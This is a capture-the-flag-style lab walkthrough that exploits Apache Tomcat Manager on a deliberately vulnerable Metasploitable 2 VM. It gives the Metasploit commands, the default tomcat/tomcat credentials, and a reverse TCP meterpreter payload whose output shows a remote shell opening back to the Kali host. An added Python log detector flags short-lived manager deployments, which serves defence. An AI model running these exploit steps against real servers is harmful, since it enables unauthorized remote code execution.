Tomcat (Apache Tomcat Manager Application Deployer Authenticated Code Execution)
Note: these labs are strongly results-oriented and use step-by-step guidance. As you progress, try to find more information and understand what you are doing.
Requirements
Metasploitable 2
The Metasploitable 2 VM
Metasploit Framework
Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP
The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Kali Linux IP
The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.
Laboratory Workflow
The following describes the steps to be carried out during the laboratory. You may introduce variations and learn from them.
1. Launch the Metasploit Framework
msfconsole
2. Use the module
use exploit/multi/http/tomcat_mgr_deploy
set PAYLOAD java/meterpreter/reverse_tcp
(this may be optional if you already have a payload configured when you select the module)
3. Check the module options
options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
HttpPassword                   no        The password for the specified username
HttpUsername                   no        The username to authenticate as
PATH          /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT         80               yes       The target port (TCP)
SSL           false            no        Negotiate SSL/TLS for outgoing connections
VHOST                          no        HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
LHOST         192.168.8.147    yes       The listen address (an interface may be specified)
LPORT         4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic
4. Set the appropriate options
set RHOSTS 192.168.8.142
set RPORT 8180
set HttpUsername tomcat
set HttpPassword tomcat
set LHOST 192.168.8.147
set LPORT 4444
RHOSTS => 192.168.8.142
RPORT => 8180
HttpUsername => tomcat
HttpPassword => tomcat
LHOST => 192.168.8.147
LPORT => 4444
5. Run the exploit
exploit
[*] Started reverse TCP handler on 192.168.8.147:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6218 bytes as MdTPiApkM.war ...
[*] Executing /MdTPiApkM/uUFB3Y0B.jsp...
[*] Undeploying MdTPiApkM ...
[*] Sending stage (58829 bytes) to 192.168.8.142
[*] Meterpreter session 2 opened (192.168.8.147:4444 -> 192.168.8.142:58303) at 2023-03-28 18:56:15 -0400
meterpreter >
6. Meterpreter session
You now have a Meterpreter session open. This session allows you to interact with the target.
meterpreter >
7. Open a shell on the target machine
shell
meterpreter > shell
Process 1 created.
Channel 1 created.
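Seen from the Tomcat side, the run in step 5 leaves a distinctive trace: an application is deployed through the manager, a JSP under the new context is requested, and the context is undeployed seconds later. The following added example (not part of the original lab or of Metasploit) flags that sequence in an access log; the log format, the HTTP methods in the sample lines and the function name are assumptions, and the sample lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Tomcat's "common" access-log pattern (an assumption
# about the target's AccessLogValve setup); names and IPs mirror the run above.
SAMPLE_LOG = """\
192.168.8.147 - tomcat [28/Mar/2023:18:56:14 -0400] "PUT /manager/deploy?path=/MdTPiApkM HTTP/1.1" 200 -
192.168.8.147 - - [28/Mar/2023:18:56:15 -0400] "GET /MdTPiApkM/uUFB3Y0B.jsp HTTP/1.1" 200 -
192.168.8.147 - tomcat [28/Mar/2023:18:56:15 -0400] "GET /manager/undeploy?path=/MdTPiApkM HTTP/1.1" 200 -
192.168.8.10 - admin [28/Mar/2023:09:00:00 -0400] "PUT /manager/deploy?path=/shop HTTP/1.1" 200 -
192.168.8.20 - - [28/Mar/2023:09:30:00 -0400] "GET /shop/index.jsp HTTP/1.1" 200 -
"""

# host, ident, user, [timestamp], "METHOD URI PROTO", status
LINE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Manager /deploy and /undeploy calls; the context path is the path= parameter.
MGR = re.compile(r'^/manager/(deploy|undeploy)\?(?:.*&)?path=(/[^&]+)')

def find_short_lived_deployments(log_text, window=timedelta(seconds=60)):
    """Return alerts for apps deployed, requested and undeployed within `window`."""
    pending, alerts = {}, []          # context path -> state of an open deployment
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue                  # skip lines that are not in the assumed format
        src, user, ts, _method, uri, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        mgr = MGR.match(uri)
        if mgr and status == "200":
            action, ctx = mgr.groups()
            if action == "deploy":
                pending[ctx] = {"src": src, "user": user, "at": when, "hits": []}
            elif ctx in pending:      # undeploy of a context we saw being deployed
                dep = pending.pop(ctx)
                if dep["hits"] and when - dep["at"] <= window:
                    alerts.append({"context": ctx, "source": dep["src"],
                                   "user": dep["user"], "requests": dep["hits"]})
            continue
        for ctx, dep in pending.items():
            if uri.startswith(ctx + "/"):     # request served by the new app
                dep["hits"].append(uri)
    return alerts

if __name__ == "__main__":
    for alert in find_short_lived_deployments(SAMPLE_LOG):
        print(alert)
```

The long-lived /shop deployment in the sample is not reported, because it is never undeployed inside the window.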
Video
Video that summarizes everything in this laboratory.

Questions
Now that you have completed this exploitation, try to answer the following:
Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?
How was this accomplished?
Try to learn more about this vulnerability.